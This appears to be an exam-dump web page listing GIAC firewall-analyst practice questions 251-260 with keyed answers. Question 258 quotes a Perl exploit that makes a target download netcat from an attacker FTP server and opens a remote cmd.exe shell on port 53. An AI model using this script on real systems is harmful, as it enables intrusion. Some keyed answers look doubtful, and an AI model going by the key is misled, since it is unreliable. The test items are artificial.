[Free] 2017(Sep) EnsurePass Testinsides GIAC GCFW Dumps with VCE and PDF 251-260

Ensurepass.com : Ensure you pass the IT Exams
2017 Sep GIAC Official New Released GCFW
100% Free Download! 100% Pass Guaranteed!
http://www.EnsurePass.com/GCFW.html

GIAC Certified Firewall Analyst

Question No: 251 – (Topic 2)

Which of the following methods is a behavior-based IDS detection method?

  1. Protocol detection

  2. Knowledge-based detection

  3. Pattern matching detection

  4. Statistical anomaly detection

Answer: D

Question No: 252 – (Topic 2)

Which of the following statements is true about ICMP packets?

Each correct answer represents a complete solution. Choose all that apply.

  1. They are used to report errors if a problem in IP processing occurs.

  2. They use UDP datagrams.

  3. They guarantee the delivery of datagrams.

  4. The PING utility uses them to verify connectivity between two hosts.

  5. They are encapsulated within IP datagrams.

Answer: A,D,E

Question No: 253 – (Topic 2)

Which of the following describes the term inside global in NAT configuration?

  1. It is a local MAC address assigned to a host in a private network.

  2. It is the data that comes inside a local network from an external host.

  3. It is a local IP address assigned to a host in a private network.

  4. It is the registered (public) IP address that represents the inside hosts in private network to the outside network.

Answer: D

Question No: 254 – (Topic 2)

You work as a technician for Tech Perfect Inc. You are troubleshooting an Internet name resolution issue. You ping your ISP#39;s DNS server address and find that the server is down. You want to continuously ping the DNS address until you have stopped the command.

Which of the following commands will you use?

  1. ping -a

  2. ping -l

  3. ping -n

  4. ping -t

Answer: D

Question No: 255 – (Topic 2)

John works as the Security Manager in PassGuide Inc. He wants to protect his network from a variant of the Denial-of-Service (DoS) attack. When the rulebase is enabled for protection, the IDP engine checks the traffic that exceeds the traffic thresholds. Which of the following rulebases is used for this purpose?

  1. Exempt rulebase

  2. SYN Protector rulebase

  3. Traffic Anomalies rulebase

  4. Backdoor rulebase

Answer: B

Question No: 256 – (Topic 2)

Session splicing is an IDS evasion technique in which an attacker delivers data in multiple small-sized packets to the target computer. Hence, it becomes very difficult for an IDS to detect the attack signatures of such attacks. Which of the following tools can be used to perform session splicing attacks?

Each correct answer represents a complete solution. Choose all that apply.

  1. Whisker

  2. Fragroute

  3. Nessus

  4. Y.A.T.

Answer: A,C

Question No: 257 – (Topic 2)

Andrew works as a Forensic Investigator for PassGuide Inc. The company has a Windows- based environment. The company#39;s employees use Microsoft Outlook Express as their e- mail client program. E-mails of some employees have been deleted due to a virus attack on the network.

Andrew is therefore assigned the task to recover the deleted mails. Which of the following tools can Andrew use to accomplish the task?

Each correct answer represents a complete solution. Choose two.

  1. FINALeMAIL

  2. R-mail

  3. EventCombMT

  4. eMailTrackerPro

Answer: A,B

Question No: 258 – (Topic 2)

Adam, a malicious hacker performs an exploit, which is given below:

#################################################################

$port = 53;

# Spawn cmd.exe on port X

$your = quot;192.168.1.1quot;;# Your FTP Server 89

$user = quot;Anonymousquot;;# login as

$pass = #39;noone@nowhere.com#39;;# password

#################################################################

$host = $ARGV[0]; print quot;Starting …\nquot;;

print quot;Server will download the file nc.exe from $your FTP server.\nquot;; system(quot;perl msadc.pl -h

$host -C \quot;echo

open $your gt;sasfile\quot;quot;); system(quot;perl msadc.pl -h $host -C \quot;echo $usergt;gt;sasfile\quot;quot;); system

(quot;perl msadc.pl -h

$host -C \quot;echo $passgt;gt;sasfile\quot;quot;); system(quot;perl msadc.pl -h $host -C \quot;echo bingt;gt;sasfile\quot;quot;);

system(quot;perl

msadc.pl -h $host -C \quot;echo get nc.exegt;gt;sasfile\quot;quot;); system(quot;perl msadc.pl -h $host –

C \quot;echo get hacked.

htmlgt;gt;sasfile\quot;quot;); system(quot;perl msadc.pl -h $host -C \quot;echo quitgt;gt;sasfile\quot;quot;); print quot;Server is

downloading …

\nquot;;

system(quot;perl msadc.pl -h $host -C \quot;ftp \-s\:sasfile\quot;quot;); print quot;Press ENTER when download is

finished …

(Have a ftp server)\nquot;;

$o=; print quot;Opening …\nquot;;

system(quot;perl msadc.pl -h $host -C \quot;nc -l -p $port -e cmd.exe\quot;quot;); print quot;Done.\nquot;;

#system(quot;telnet $host $portquot;); exit(0);

Which of the following is the expected result of the above exploit?

  1. Creates a share called quot;sasfilequot; on the target system

  2. Opens up a telnet listener that requires no username or password

  3. Opens up a SMTP server that requires no username or password

  4. Creates an FTP server with write permissions enabled

Answer: B

Question No: 259 – (Topic 2)

Which of the following responsibilities does not come under the audit process? Each correct answer represents a complete solution. Choose all that apply.

  1. Reporting all facts and circumstances of the irregular and illegal acts.

  2. Reviewing the results of the audit procedures.

  3. Planning the IT audit engagement based on the assessed level of risk.

  4. Applying security policies.

Answer: A,B,C

Question No: 260 – (Topic 2)

Your customer is concerned about security. He wants to make certain no one in the outside world can see the IP addresses inside his network. What feature of a router would accomplish this?

  1. NAT

  2. Firewall

  3. Port forwarding

  4. MAC filtering

Answer: A

100% Ensurepass Free Download!
Download Free Demo:GCFW Demo PDF
100% Ensurepass Free Guaranteed!
Download 2017 EnsurePass GCFW Dumps

EnsurePass ExamCollection Testking
Lowest Price Guarantee Yes No No
Up-to-Dated Yes No No
Real Questions Yes No No
Explanation Yes No No
PDF VCE Yes No No
Free VCE Simulator Yes No No
Instant Download Yes No No

2017 EnsurePass IT Certification PDF and VCE

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.